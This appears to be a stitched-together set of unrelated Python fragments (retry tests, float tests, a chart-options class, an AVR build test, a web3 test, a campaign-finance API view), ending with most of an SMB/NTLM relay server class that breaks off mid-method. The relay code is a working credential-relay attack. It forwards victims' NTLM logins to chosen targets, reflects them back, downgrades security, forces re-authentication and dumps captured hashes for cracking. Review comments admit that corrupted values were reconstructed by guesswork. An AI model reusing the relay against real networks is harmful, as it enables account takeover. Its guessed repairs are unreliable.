        fail = failed_response()
        success = ok_response()
        sender = mock_sender(fail, fail, fail, success, is_async=True)
        s = RetryingSender(retries=2, sender=sender)
        with patch((module + '.asyncio'), AsyncMock()):
            (await s.send(mock_request()))
        assert (sender.send.call_count == 3)

    def test_retry_returns_on_first_success(self):
        fail = failed_response()
        success = ok_response()
        sender = mock_sender(fail, fail, success, fail, success)
        s = RetryingSender(retries=5, sender=sender)
        with patch((module + '.time'), MagicMock()):
            s.send(mock_request())
        assert (sender.send.call_count == 3)

    @pytest.mark.asyncio
    async def test_async_retry_returns_on_first_success(self):
        fail = failed_response()
        success = ok_response()
        sender = mock_sender(fail, fail, success, fail, is_async=True)
        s = RetryingSender(retries=5, sender=sender)
        with patch((module + '.asyncio'), AsyncMock()):
            (await s.send(mock_request()))
        assert (sender.send.call_count == 3)

    def test_rate_limited_retry_doesnt_decrease_retry_count(self):
        fail = failed_response()
        rate = rate_limit_response()
        success = ok_response()
        sender = mock_sender(fail, rate, fail, success)
        s = RetryingSender(retries=2, sender=sender)
        with patch((module + '.time'), MagicMock()):
            s.send(mock_request())
        # The rate-limited attempt does not consume one of the two retries.
        assert (sender.send.call_count == 4)

    @pytest.mark.asyncio
    async def test_async_rate_limited_retry_doesnt_decrease_retry_count(self):
        fail = failed_response()
        rate = rate_limit_response()
        success = ok_response()
        sender = mock_sender(fail, rate, fail, success, is_async=True)
        s = RetryingSender(retries=2, sender=sender)
        with patch((module + '.asyncio'), AsyncMock()):
            (await s.send(mock_request()))
        assert (sender.send.call_count == 4)
@pytest.mark.parametrize(
    'input, output',
    [
        (0, 0),
        (float('inf'), float('inf')),
        (float('-inf'), float('-inf')),
        (0.1, 0.1),
        ((- 0.0), (- 0.0)),
        # NOTE(review): the next entries were corrupted in the source
        # (`(0., 0.1)`, `(- )`, ...); they are reconstructed as float32
        # round-trip values, which is what this helper undoes — verify
        # against the upstream test suite.
        (0.10000000149011612, 0.1),
        (1, 1),
        ((- 1), (- 1)),
        ((- 0.10000000149011612), (- 0.1)),
        ((- 152.53909301757812), (- 152.53909301757812)),
        ((- 0.0), (- 0.0)),
        (0.5, 0.5),
        (1.9e-15, 1.9e-15),
    ],
)
def test_fix_float_single_double_conversion(input, output):
    """fix_float_single_double_conversion should undo float32->float64 drift."""
    assert (util.fix_float_single_double_conversion(input) == output)
class OptionPlotoptionsPictorialSonificationTracksMappingHighpass(Options):
    """Highpass-filter mapping options for pictorial sonification tracks.

    NOTE(review): sibling option classes in this file use @property getters that
    were apparently stripped; these accessors may originally have been properties
    as well — verify against the generator that produced this file.
    """

    def frequency(self) -> 'OptionPlotoptionsPictorialSonificationTracksMappingHighpassFrequency':
        """Sub-options controlling the highpass filter frequency mapping."""
        return self._config_sub_data('frequency', OptionPlotoptionsPictorialSonificationTracksMappingHighpassFrequency)

    def resonance(self) -> 'OptionPlotoptionsPictorialSonificationTracksMappingHighpassResonance':
        """Sub-options controlling the highpass filter resonance mapping."""
        return self._config_sub_data('resonance', OptionPlotoptionsPictorialSonificationTracksMappingHighpassResonance)
@pytest.mark.skipif(bool(missing_avr_buildtools), reason=str(missing_avr_buildtools))
def test_model_size_avr8():
    """Compile a small AVR8 program and sanity-check its reported flash size.

    Fixes: the decorator had been mangled to a bare ``.skipif`` (syntax error),
    and the embedded C source contained two truncated binary literals
    (``0b;`` and ``0b + out``) that would fail avr-gcc compilation.
    NOTE(review): the restored literals target PINB0 per the adjacent comments
    (set bit 0 / clear bit 0) — confirm against the original test program.
    """
    avr_example_program = '\n    #include <stdbool.h>\n    #include <avr/io.h>\n    #include <util/delay.h>\n\n    int main()\n    {\n        // set PINB0 to output in DDRB\n        DDRB |= 0b00000001;\n\n        // Set input\n        DDRB &= ~(1 << PINB4);\n\n        const bool pin_state = (PINB & (1 << PINB4)) >> PINB4;\n\n        const float f = 2.0+ (pin_state*3.3 / 7.4);\n        const int out = f < 1.5; \n\n        // set PINB0 low\n        PORTB &= 0b11111110 + out;\n        _delay_ms(500);\n    }\n    '
    code = avr_example_program
    sizes = get_program_size(code, platform='avr')
    # Even this tiny program links the AVR runtime, so flash use is non-trivial.
    assert (sizes['program'] >= 1000), sizes
def test_eth_call_offchain_lookup_raises_when_ccip_read_is_disabled(w3, offchain_lookup_contract):
    """OffchainLookup must propagate when CCIP Read is disabled, whether per-call
    or globally on the provider.

    Fix: the global ``ccip_read_enabled`` flag is now restored in a ``finally``
    block, so a failing assertion mid-test no longer leaves the shared ``w3``
    fixture with CCIP Read disabled for subsequent tests.
    """
    # Per-call opt-out on a plain function call.
    with pytest.raises(OffchainLookup):
        offchain_lookup_contract.functions.testOffchainLookup(OFFCHAIN_LOOKUP_CONTRACT_TEST_DATA).call(ccip_read_enabled=False)
    # Per-call opt-out via the caller interface.
    with pytest.raises(OffchainLookup):
        offchain_lookup_contract.caller(ccip_read_enabled=False).testOffchainLookup(OFFCHAIN_LOOKUP_CONTRACT_TEST_DATA)
    w3.provider.global_ccip_read_enabled = False
    try:
        # Globally disabled: both call styles must raise.
        with pytest.raises(OffchainLookup):
            offchain_lookup_contract.caller.testOffchainLookup(OFFCHAIN_LOOKUP_CONTRACT_TEST_DATA)
        with pytest.raises(OffchainLookup):
            offchain_lookup_contract.caller(ccip_read_enabled=False).testOffchainLookup(OFFCHAIN_LOOKUP_CONTRACT_TEST_DATA)
    finally:
        # Always re-enable so the shared fixture is left in its default state.
        w3.provider.global_ccip_read_enabled = True
@doc(tags=['financial'], description=docs.REPORTS, params={'committee_id': {'description': docs.COMMITTEE_ID}})
class CommitteeReportsView(views.ApiResource):
    """Paginated committee financial reports, filterable by committee or type.

    Fix: the flask-apispec decorators had been mangled (the class decorator was
    reduced to a bare keyword-argument tuple — a syntax error — and the method
    decorators to ``_kwargs``/``_with``). Restored as ``@doc``, ``@use_kwargs``
    and ``@marshal_with``.
    NOTE(review): confirm these names against this module's imports.
    """

    @use_kwargs(args.paging)
    @use_kwargs(args.committee_reports)
    @use_kwargs(args.make_multi_sort_args(default=['-coverage_end_date']))
    @marshal_with(schemas.CommitteeReportsPageSchema(), apply=False)
    def get(self, committee_id=None, committee_type=None, **kwargs):
        """Return one page of reports for the resolved committee/type."""
        (query, reports_class, reports_schema) = self.build_query(committee_id=committee_id.upper(), committee_type=committee_type, **kwargs)
        if kwargs['sort']:
            # Reject sort columns that have no index on the resolved model.
            validator = args.IndicesValidator(reports_class)
            validator(kwargs['sort'])
        page = utils.fetch_page(query, kwargs, model=reports_class, multi=True)
        return reports_schema().dump(page)

    def build_query(self, committee_id=None, committee_type=None, **kwargs):
        """Build the filtered SQLAlchemy query plus the model/schema pair to use."""
        (reports_class, reports_schema) = reports_schema_map.get(self._resolve_committee_type(committee_id=committee_id.upper(), committee_type=committee_type, **kwargs), default_schemas)
        query = reports_class.query
        filter_multi_fields = [('amendment_indicator', models.CommitteeReports.amendment_indicator), ('report_type', reports_class.report_type), ('year', reports_class.report_year), ('cycle', reports_class.cycle), ('beginning_image_number', reports_class.beginning_image_number)]
        if hasattr(reports_class, 'committee'):
            # Eager-load the committee relationship to avoid N+1 queries.
            query = reports_class.query.options(sa.orm.joinedload(reports_class.committee))
        if (committee_id is not None):
            query = query.filter_by(committee_id=committee_id)
        # filter_range_fields / filter_match_fields are module-level tables.
        query = filters.filter_range(query, kwargs, filter_range_fields)
        query = filters.filter_match(query, kwargs, filter_match_fields)
        query = filters.filter_multi(query, kwargs, filter_multi_fields)
        return (query, reports_class, reports_schema)

    def _resolve_committee_type(self, committee_id=None, committee_type=None, **kwargs):
        """Resolve the committee type, either from history rows or directly."""
        if (committee_id is not None):
            utils.check_committee_id(committee_id)
            query = models.CommitteeHistory.query.filter_by(committee_id=committee_id)
            if kwargs.get('cycle'):
                query = query.filter(models.CommitteeHistory.cycle.in_(kwargs['cycle']))
            if kwargs.get('year'):
                # Round odd years up to their two-year election cycle.
                cycle_list = [(year + (year % 2)) for year in kwargs['year']]
                query = query.filter(models.CommitteeHistory.cycle.in_(cycle_list))
            # Most recent cycle wins when several match.
            query = query.order_by(sa.desc(models.CommitteeHistory.cycle))
            committee = query.first_or_404()
            return committee.committee_type
        elif (committee_type is not None):
            return reports_type_map.get(committee_type)
class SMBRelayServer(Thread):
    """SMB server thread that relays incoming NTLM authentications to targets.

    Wraps an impacket ``SMBSERVER``, hooking the SMB1 and SMB2 negotiate,
    session-setup and tree-connect commands so that credentials presented by
    connecting clients are replayed against the targets supplied by
    ``config.target``.

    Fixes applied in review:
    - ``SmbSessionSetup``: ``random.randint(1, )`` was a syntax error; the
      upper bound is restored to ``0xFFFFFFFF`` (a random 32-bit session id).
    - ``smb2TreeConnect`` / ``smbComTreeConnectAndX``: two LOG format strings
      had an escaped ``%%s`` with a surplus argument tuple, raising
      ``TypeError: not all arguments converted`` at runtime; restored to
      ``%s@%s`` (user @ client IP).
    - ``smbComTreeConnectAndX``: the ``disableMulti`` branch recursed into
      itself instead of calling the saved original hook, and the original
      hook call was missing its ``SMBCommand`` argument.
    """

    def __init__(self, config):
        Thread.__init__(self)
        self.daemon = True
        self.server = 0
        # Relay configuration (targets, mode, SOCKS, output paths, ...).
        self.config = config
        self.target = None
        self.targetprocessor = self.config.target
        self.authUser = None
        self.proxyTranslator = None
        # Build an in-memory smbserver config exposing only an IPC$ share.
        smbConfig = ConfigParser.ConfigParser()
        smbConfig.add_section('global')
        smbConfig.set('global', 'server_name', 'server_name')
        smbConfig.set('global', 'server_os', 'UNIX')
        smbConfig.set('global', 'server_domain', 'WORKGROUP')
        smbConfig.set('global', 'log_file', 'smb.log')
        smbConfig.set('global', 'credentials_file', '')
        if (self.config.smb2support is True):
            smbConfig.set('global', 'SMB2Support', 'True')
        else:
            smbConfig.set('global', 'SMB2Support', 'False')
        smbConfig.set('global', 'anonymous_logon', 'False')
        if (self.config.outputFile is not None):
            smbConfig.set('global', 'jtr_dump_path', self.config.outputFile)
        if (self.config.SMBServerChallenge is not None):
            smbConfig.set('global', 'challenge', self.config.SMBServerChallenge)
        smbConfig.add_section('IPC$')
        smbConfig.set('IPC$', 'comment', '')
        smbConfig.set('IPC$', 'read only', 'yes')
        smbConfig.set('IPC$', 'share type', '3')
        smbConfig.set('IPC$', 'path', '')
        if self.config.ipv6:
            SMBSERVER.address_family = socket.AF_INET6
        if self.config.listeningPort:
            smbport = self.config.listeningPort
        else:
            smbport = 445
        self.server = SMBSERVER((config.interfaceIp, smbport), config_parser=smbConfig)
        if (not self.config.disableMulti):
            self.server.setAuthCallback(auth_callback)
        # Silence the inner smbserver logger; this module does its own logging.
        logging.getLogger('impacket.smbserver').setLevel(logging.CRITICAL)
        self.server.processConfigFile()
        # Hook SMB1 and SMB2 commands, keeping the original handlers around.
        self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
        self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX)
        self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
        self.origSmbNegotiate = self.server.hookSmb2Command(smb3.SMB2_NEGOTIATE, self.SmbNegotiate)
        self.origSmbSessionSetup = self.server.hookSmb2Command(smb3.SMB2_SESSION_SETUP, self.SmbSessionSetup)
        self.origsmb2TreeConnect = self.server.hookSmb2Command(smb3.SMB2_TREE_CONNECT, self.smb2TreeConnect)
        self.server.addConnection('SMBRelay', config.interfaceIp, 445)

    def SmbNegotiate(self, connId, smbServer, recvPacket, isSMB1=False):
        """Handle SMB2 NEGOTIATE; in single-relay mode also connect to the target."""
        connData = smbServer.getConnectionData(connId, checkStatus=False)
        respPacket = smb3.SMB2Packet()
        respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR
        respPacket['Status'] = STATUS_SUCCESS
        respPacket['CreditRequestResponse'] = 1
        respPacket['Command'] = smb3.SMB2_NEGOTIATE
        respPacket['SessionID'] = 0
        if self.config.disableMulti:
            if (self.config.mode.upper() == 'REFLECTION'):
                # Reflection mode: the attacker relays back to the client itself.
                self.targetprocessor = TargetsProcessor(singleTarget=('SMB://%s:445/' % connData['ClientIP']))
            self.target = self.targetprocessor.getTarget(multiRelay=False)
            if (self.target is None):
                LOG.info(('SMBD-%s: Connection from %s controlled, but there are no more targets left!' % (connId, connData['ClientIP'])))
                return ([SMB2Error()], None, STATUS_BAD_NETWORK_NAME)
            LOG.info(('SMBD-%s: Received connection from %s, attacking target %s://%s' % (connId, connData['ClientIP'], self.target.scheme, self.target.netloc)))
            try:
                if (self.config.mode.upper() == 'REFLECTION'):
                    LOG.debug('Downgrading to standard security')
                    extSec = False
                else:
                    extSec = True
                client = self.init_client(extSec)
            except Exception as e:
                LOG.error(('Connection against target %s://%s FAILED: %s' % (self.target.scheme, self.target.netloc, str(e))))
                self.targetprocessor.logTarget(self.target)
            else:
                connData['SMBClient'] = client
                connData['EncryptionKey'] = client.getStandardSecurityChallenge()
                smbServer.setConnectionData(connId, connData)
        if (isSMB1 is False):
            respPacket['MessageID'] = recvPacket['MessageID']
        else:
            respPacket['MessageID'] = 0
        respPacket['TreeID'] = 0
        respSMBCommand = smb3.SMB2Negotiate_Response()
        respSMBCommand['SecurityMode'] = smb3.SMB2_NEGOTIATE_SIGNING_ENABLED
        if (isSMB1 is True):
            # SMB1 negotiate carrying SMB2 dialects: only answer if the client
            # advertises SMB 2.002 support, otherwise stay on SMB1.
            SMBCommand = smb.SMBCommand(recvPacket['Data'][0])
            dialects = SMBCommand['Data'].split(b'\x02')
            if ((b'SMB 2.002\x00' in dialects) or (b'SMB 2.???\x00' in dialects)):
                respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002
            else:
                raise Exception('Client does not support SMB2, fallbacking')
        else:
            respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002
        respSMBCommand['ServerGuid'] = b(''.join([random.choice(string.ascii_letters) for _ in range(16)]))
        respSMBCommand['Capabilities'] = 0
        respSMBCommand['MaxTransactSize'] = 65536
        respSMBCommand['MaxReadSize'] = 65536
        respSMBCommand['MaxWriteSize'] = 65536
        respSMBCommand['SystemTime'] = getFileTime(calendar.timegm(time.gmtime()))
        respSMBCommand['ServerStartTime'] = getFileTime(calendar.timegm(time.gmtime()))
        respSMBCommand['SecurityBufferOffset'] = 128
        blob = SPNEGO_NegTokenInit()
        blob['MechTypes'] = [TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism'], TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
        respSMBCommand['Buffer'] = blob.getData()
        respSMBCommand['SecurityBufferLength'] = len(respSMBCommand['Buffer'])
        respPacket['Data'] = respSMBCommand
        smbServer.setConnectionData(connId, connData)
        return (None, [respPacket], STATUS_SUCCESS)

    def SmbSessionSetup(self, connId, smbServer, recvPacket):
        """Handle SMB2 SESSION_SETUP, relaying the NTLM exchange to the target."""
        connData = smbServer.getConnectionData(connId, checkStatus=False)
        if ((not self.config.disableMulti) and ('relayToHost' not in connData)):
            # Multi-relay: let the original server authenticate locally first;
            # strip the GUEST flag so the client proceeds as a real session.
            (respCommands, respPackets, errorCode) = self.origSmbSessionSetup(connId, smbServer, recvPacket)
            if ('SessionFlags' in respCommands[0].fields):
                respCommands[0]['SessionFlags'] = 0
            return (respCommands, respPackets, errorCode)
        respSMBCommand = smb3.SMB2SessionSetup_Response()
        sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data'])
        connData['Capabilities'] = sessionSetupData['Capabilities']
        securityBlob = sessionSetupData['Buffer']
        rawNTLM = False
        if (struct.unpack('B', securityBlob[0:1])[0] == ASN1_AID):
            # NEGOTIATE packet wrapped in SPNEGO NegTokenInit.
            blob = SPNEGO_NegTokenInit(securityBlob)
            token = blob['MechToken']
            if (len(blob['MechTypes'][0]) > 0):
                mechType = blob['MechTypes'][0]
                if ((mechType != TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']) and (mechType != TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism'])):
                    # Unsupported mechanism: ask the client to retry with NTLMSSP.
                    if (mechType in MechTypes):
                        mechStr = MechTypes[mechType]
                    else:
                        mechStr = hexlify(mechType)
                    smbServer.log(("Unsupported MechType '%s'" % mechStr), logging.CRITICAL)
                    respToken = SPNEGO_NegTokenResp()
                    respToken['NegState'] = b'\x03'
                    respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
                    respToken = respToken.getData()
                    respSMBCommand['SecurityBufferOffset'] = 72
                    respSMBCommand['SecurityBufferLength'] = len(respToken)
                    respSMBCommand['Buffer'] = respToken
                    return ([respSMBCommand], None, STATUS_MORE_PROCESSING_REQUIRED)
        elif (struct.unpack('B', securityBlob[0:1])[0] == ASN1_SUPPORTED_MECH):
            # AUTH packet wrapped in SPNEGO NegTokenResp.
            blob = SPNEGO_NegTokenResp(securityBlob)
            token = blob['ResponseToken']
        else:
            # Raw NTLMSSP with no SPNEGO framing.
            rawNTLM = True
            token = securityBlob
        messageType = struct.unpack('<L', token[len('NTLMSSP\x00'):(len('NTLMSSP\x00') + 4)])[0]
        if (messageType == 1):
            # NTLM NEGOTIATE: forward to the target and return its challenge.
            negotiateMessage = ntlm.NTLMAuthNegotiate()
            negotiateMessage.fromString(token)
            connData['NEGOTIATE_MESSAGE'] = negotiateMessage
            client = connData['SMBClient']
            try:
                challengeMessage = self.do_ntlm_negotiate(client, token)
            except Exception as e:
                LOG.debug('Exception:', exc_info=True)
                self.targetprocessor.logTarget(self.target)
                raise
            if (rawNTLM is False):
                respToken = SPNEGO_NegTokenResp()
                respToken['NegState'] = b'\x01'
                respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
                respToken['ResponseToken'] = challengeMessage.getData()
            else:
                respToken = challengeMessage
            errorCode = STATUS_MORE_PROCESSING_REQUIRED
            # FIX: upper bound was truncated to ``random.randint(1, )``; a
            # session id is a random 32-bit value.
            connData['Uid'] = random.randint(1, 0xFFFFFFFF)
            connData['CHALLENGE_MESSAGE'] = challengeMessage
        elif (messageType == 2):
            raise Exception('Challenge Message raise, not implemented!')
        elif (messageType == 3):
            # NTLM AUTHENTICATE: replay the response against the target.
            client = connData['SMBClient']
            authenticateMessage = ntlm.NTLMAuthChallengeResponse()
            authenticateMessage.fromString(token)
            self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))).upper()
            if (rawNTLM is True):
                respToken2 = SPNEGO_NegTokenResp()
                respToken2['ResponseToken'] = securityBlob
                securityBlob = respToken2.getData()
            if self.config.remove_mic:
                (clientResponse, errorCode) = self.do_ntlm_auth(client, token, connData['CHALLENGE_MESSAGE']['challenge'])
            else:
                (clientResponse, errorCode) = self.do_ntlm_auth(client, securityBlob, connData['CHALLENGE_MESSAGE']['challenge'])
            if (errorCode != STATUS_SUCCESS):
                self.targetprocessor.logTarget(self.target)
                LOG.error(('Authenticating against %s://%s as %s FAILED' % (self.target.scheme, self.target.netloc, self.authUser)))
                client.killConnection()
            else:
                LOG.info(('Authenticating against %s://%s as %s SUCCEED' % (self.target.scheme, self.target.netloc, self.authUser)))
                self.targetprocessor.logTarget(self.target, True, self.authUser)
                ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'])
                client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
                if (self.server.getJTRdumpPath() != ''):
                    writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath())
                connData['Authenticated'] = True
                if (not self.config.disableMulti):
                    del connData['relayToHost']
                self.do_attack(client)
                if (rawNTLM is False):
                    respToken = SPNEGO_NegTokenResp()
                    respToken['NegState'] = b'\x00'
                else:
                    respToken = ''
            connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
        else:
            raise Exception(('Unknown NTLMSSP MessageType %d' % messageType))
        respSMBCommand['SecurityBufferOffset'] = 72
        respSMBCommand['SecurityBufferLength'] = len(respToken)
        if (respSMBCommand['SecurityBufferLength'] > 0):
            respSMBCommand['Buffer'] = respToken.getData()
        else:
            respSMBCommand['Buffer'] = ''
        smbServer.setConnectionData(connId, connData)
        return ([respSMBCommand], None, errorCode)

    def smb2TreeConnect(self, connId, smbServer, recvPacket):
        """On SMB2 TREE_CONNECT in multi-relay mode, pick a target for this user
        and force the client to re-authenticate (session expired)."""
        connData = smbServer.getConnectionData(connId)
        authenticateMessage = connData['AUTHENTICATE_MESSAGE']
        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))).upper()
        if self.config.disableMulti:
            return self.origsmb2TreeConnect(connId, smbServer, recvPacket)
        try:
            if (self.config.mode.upper() == 'REFLECTION'):
                self.targetprocessor = TargetsProcessor(singleTarget=('SMB://%s:445/' % connData['ClientIP']))
            self.target = self.targetprocessor.getTarget(identity=self.authUser)
            if (self.target is None):
                # FIX: format string had '%%s' with a surplus argument tuple.
                LOG.info(('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' % (connId, self.authUser, connData['ClientIP'])))
                return self.origsmb2TreeConnect(connId, smbServer, recvPacket)
            # FIX: same '%%s' / argument-count mismatch as above.
            LOG.info(('SMBD-%s: Connection from %s@%s controlled, attacking target %s://%s' % (connId, self.authUser, connData['ClientIP'], self.target.scheme, self.target.netloc)))
            if (self.config.mode.upper() == 'REFLECTION'):
                LOG.debug('Downgrading to standard security')
                extSec = False
            else:
                extSec = True
            client = self.init_client(extSec)
        except Exception as e:
            LOG.error(('Connection against target %s://%s FAILED: %s' % (self.target.scheme, self.target.netloc, str(e))))
            self.targetprocessor.logTarget(self.target)
        else:
            # Mark this connection for relaying and drop the stale NTLM state.
            connData['relayToHost'] = True
            connData['Authenticated'] = False
            del connData['NEGOTIATE_MESSAGE']
            del connData['CHALLENGE_MESSAGE']
            del connData['AUTHENTICATE_MESSAGE']
            connData['SMBClient'] = client
            connData['EncryptionKey'] = client.getStandardSecurityChallenge()
            smbServer.setConnectionData(connId, connData)
        respPacket = smb3.SMB2Packet()
        respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR
        respPacket['Status'] = STATUS_SUCCESS
        respPacket['CreditRequestResponse'] = 1
        respPacket['Command'] = recvPacket['Command']
        respPacket['SessionID'] = connData['Uid']
        respPacket['Reserved'] = recvPacket['Reserved']
        respPacket['MessageID'] = recvPacket['MessageID']
        respPacket['TreeID'] = recvPacket['TreeID']
        respSMBCommand = smb3.SMB2TreeConnect_Response()
        # Answer "session expired" so the client re-authenticates and we can
        # relay the fresh authentication.
        errorCode = STATUS_NETWORK_SESSION_EXPIRED
        respPacket['Status'] = errorCode
        respSMBCommand['Capabilities'] = 0
        respSMBCommand['MaximalAccess'] = 983551
        respPacket['Data'] = respSMBCommand
        if connData['SignatureEnabled']:
            smbServer.signSMBv2(respPacket, connData['SigningSessionKey'])
        smbServer.setConnectionData(connId, connData)
        return (None, [respPacket], errorCode)

    def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
        """Handle SMB1 NEGOTIATE; in single-relay mode connect to the target."""
        connData = smbServer.getConnectionData(connId, checkStatus=False)
        if self.config.disableMulti:
            if (self.config.mode.upper() == 'REFLECTION'):
                self.targetprocessor = TargetsProcessor(singleTarget=('SMB://%s:445/' % connData['ClientIP']))
            self.target = self.targetprocessor.getTarget(multiRelay=False)
            if (self.target is None):
                LOG.info(('SMBD-%s: Connection from %s controlled, but there are no more targets left!' % (connId, connData['ClientIP'])))
                return ([smb.SMBCommand(smb.SMB.SMB_COM_NEGOTIATE)], None, STATUS_BAD_NETWORK_NAME)
            LOG.info(('SMBD-%s: Received connection from %s, attacking target %s://%s' % (connId, connData['ClientIP'], self.target.scheme, self.target.netloc)))
            try:
                if ((recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY) == 0):
                    extSec = False
                elif (self.config.mode.upper() == 'REFLECTION'):
                    LOG.debug('Downgrading to standard security')
                    extSec = False
                    # NOTE(review): '+= ~flag' is an odd way to clear a bit
                    # ('&= ~flag' is the usual form) — confirm against upstream
                    # before changing, since the field may be re-masked on pack.
                    recvPacket['Flags2'] += (~ smb.SMB.FLAGS2_EXTENDED_SECURITY)
                else:
                    extSec = True
                client = self.init_client(extSec)
            except Exception as e:
                LOG.error(('Connection against target %s://%s FAILED: %s' % (self.target.scheme, self.target.netloc, str(e))))
                self.targetprocessor.logTarget(self.target)
            else:
                connData['SMBClient'] = client
                connData['EncryptionKey'] = client.getStandardSecurityChallenge()
                smbServer.setConnectionData(connId, connData)
        elif ((recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY) != 0):
            if (self.config.mode.upper() == 'REFLECTION'):
                LOG.debug('Downgrading to standard security')
                # NOTE(review): see bit-clearing note above.
                recvPacket['Flags2'] += (~ smb.SMB.FLAGS2_EXTENDED_SECURITY)
        return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)

    def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
        """Handle SMB1 SESSION_SETUP_ANDX, relaying NTLM (extended or standard
        security) to the target."""
        connData = smbServer.getConnectionData(connId, checkStatus=False)
        if ((not self.config.disableMulti) and ('relayToHost' not in connData)):
            return self.origSmbSessionSetupAndX(connId, smbServer, SMBCommand, recvPacket)
        respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
        if (connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY):
            # Extended security: SPNEGO-wrapped NTLMSSP exchange.
            respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters()
            respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
            sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters'])
            sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
            sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
            sessionSetupData.fromString(SMBCommand['Data'])
            connData['Capabilities'] = sessionSetupParameters['Capabilities']
            rawNTLM = False
            if (struct.unpack('B', sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID):
                # AUTH packet
                blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
                token = blob['ResponseToken']
            else:
                # NEGOTIATE packet
                blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
                token = blob['MechToken']
            messageType = struct.unpack('<L', token[len('NTLMSSP\x00'):(len('NTLMSSP\x00') + 4)])[0]
            if (messageType == 1):
                negotiateMessage = ntlm.NTLMAuthNegotiate()
                negotiateMessage.fromString(token)
                connData['NEGOTIATE_MESSAGE'] = negotiateMessage
                client = connData['SMBClient']
                try:
                    challengeMessage = self.do_ntlm_negotiate(client, token)
                except Exception:
                    self.targetprocessor.logTarget(self.target)
                    raise
                respToken = SPNEGO_NegTokenResp()
                respToken['NegState'] = b'\x01'
                respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
                respToken['ResponseToken'] = challengeMessage.getData()
                errorCode = STATUS_MORE_PROCESSING_REQUIRED
                connData['Uid'] = 10
                connData['CHALLENGE_MESSAGE'] = challengeMessage
            elif (messageType == 3):
                client = connData['SMBClient']
                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                authenticateMessage.fromString(token)
                self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))).upper()
                (clientResponse, errorCode) = self.do_ntlm_auth(client, sessionSetupData['SecurityBlob'], connData['CHALLENGE_MESSAGE']['challenge'])
                if (errorCode != STATUS_SUCCESS):
                    # Relay failed: hand the client a plain error packet.
                    packet = smb.NewSMBPacket()
                    packet['Flags1'] = (smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS)
                    packet['Flags2'] = (smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY)
                    packet['Command'] = recvPacket['Command']
                    packet['Pid'] = recvPacket['Pid']
                    packet['Tid'] = recvPacket['Tid']
                    packet['Mid'] = recvPacket['Mid']
                    packet['Uid'] = recvPacket['Uid']
                    packet['Data'] = b'\x00\x00\x00'
                    packet['ErrorCode'] = (errorCode >> 16)
                    packet['ErrorClass'] = (errorCode & 255)
                    LOG.error(('Authenticating against %s://%s as %s FAILED' % (self.target.scheme, self.target.netloc, self.authUser)))
                    self.targetprocessor.logTarget(self.target)
                    client.killConnection()
                    return (None, [packet], errorCode)
                else:
                    LOG.info(('Authenticating against %s://%s as %s SUCCEED' % (self.target.scheme, self.target.netloc, self.authUser)))
                    self.targetprocessor.logTarget(self.target, True, self.authUser)
                    ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'])
                    client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
                    if (self.server.getJTRdumpPath() != ''):
                        writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath())
                    self.do_attack(client)
                    respToken = SPNEGO_NegTokenResp()
                    respToken['NegState'] = b'\x00'
                    connData['Authenticated'] = True
                    del connData['relayToHost']
                    errorCode = STATUS_SUCCESS
                connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
            else:
